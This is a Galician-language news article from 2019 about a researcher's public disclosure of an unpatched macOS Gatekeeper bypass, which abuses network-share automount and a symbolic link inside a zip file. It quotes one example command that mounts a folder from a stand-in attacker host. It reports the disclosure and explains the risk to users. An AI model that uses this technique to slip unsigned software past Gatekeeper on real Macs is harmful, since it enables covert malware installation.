É doado instalar unha aplicación maliciosa nun Mac. Apple non solucionou o erro nin despois de tres meses

27. 5. 2019

O investigador de seguridade Filippo Cavallarin publicou unha advertencia sobre o erro en macOS 10.14.5 no seu blog. Isto consiste na posibilidade de eludir completamente as medidas de seguridade de Gatekeeper. Segundo Cavallarin, sinalou o erro a Apple xa en febreiro deste ano, pero a compañía non o arranxou na última actualización.

Gatekeeper foi desenvolvido por Apple e incorporado ao seu sistema operativo de escritorio por primeira vez en 2012. É un mecanismo que impide que unha aplicación se execute sen o coñecemento e consentimento do usuario. Despois de descargar unha aplicación, Gatekeeper verifica automaticamente o seu código para ver se o software está asinado correctamente por Apple.

Na súa publicación no blog, Cavallarin sinala que Gatekeeper, por defecto, considera que tanto o almacenamento externo como as comparticións de rede son localizacións seguras. Polo tanto, calquera aplicación que resida nestes obxectivos pode iniciarse automaticamente sen ter que pasar pola comprobación de Gatekeeper. É esta característica que se pode explotar para lanzar software malicioso sen o coñecemento do usuario.

Un aspecto que permite o acceso non autorizado é a función de montaxe automática, que permite aos usuarios montar automaticamente un recurso compartido de rede simplemente especificando un camiño que comeza por "/net/". Como exemplo, Cavallarin cita a ruta "ls /net/evil-attacker.com/sharedfolder/" que pode provocar que o sistema operativo cargue o contido dun cartafol "sharefolder" nunha localización remota que pode ser potencialmente maliciosa.

Podes ver como funciona a ameaza no vídeo:

Outro factor é o feito de que se comparte un arquivo zip que contén unha ligazón simbólica específica que conduce á función de montaxe automática, Gatekeeper non o verificará. Deste xeito, a vítima pode descargar facilmente o arquivo malicioso e descomprimilo, o que permite ao atacante executar practicamente calquera software no Mac sen o coñecemento do usuario. O Finder, que oculta certas extensións por defecto, tamén ten a súa parte desta vulnerabilidade.

Cavallarin afirma no seu blog que Apple chamou a atención sobre a vulnerabilidade do sistema operativo macOS o 22 de febreiro deste ano. Pero a mediados de maio, Apple deixou de comunicarse con Cavallarin, polo que Cavallarin decidiu facer público todo o asunto.

Fonte: FCVL

Temas: almacenamento, automaticamente, MacOS, vídeo, Configuración, función, usuario, Aplicación, mazá

Discusión do artigo

O teu nome

O teu comentario

Ao cubrir os datos anteriores, acepto que a empresa TEXT FACTORY s.r.o., con domicilio social en Brno, Durďákova 336/29, Černá Pole, código postal: 613 00, número de identificación: 06157831, rexistrada no Tribunal Rexional de Brno, sección C. , inserir 100399, tratará os meus datos persoais proporcionados no formulario de rexistro cuberto por min en función dos intereses lexítimos de TEXT FACTORY s.r.o. segundo o artigo 6, apartado 1, letra. f) GDPR e para cumprir coas obrigas legais (artigo 6, parágrafo 1, letra c) GDPR), para os seguintes fins: a necesidade de garantir a autorización dos visitantes dos sitios web operados por TEXT FACTORY s.r.o. para contribuír activamente a artigos publicados ou en discusión. foros e exercendo os dereitos de TEXT FACTORY s.r.o. como administrador destes foros de discusión. Pódese atopar máis información sobre o tratamento de datos persoais e dereitos en Leccións sobre protección de datos persoais. todo o texto

Podería ser interesache

Relacionado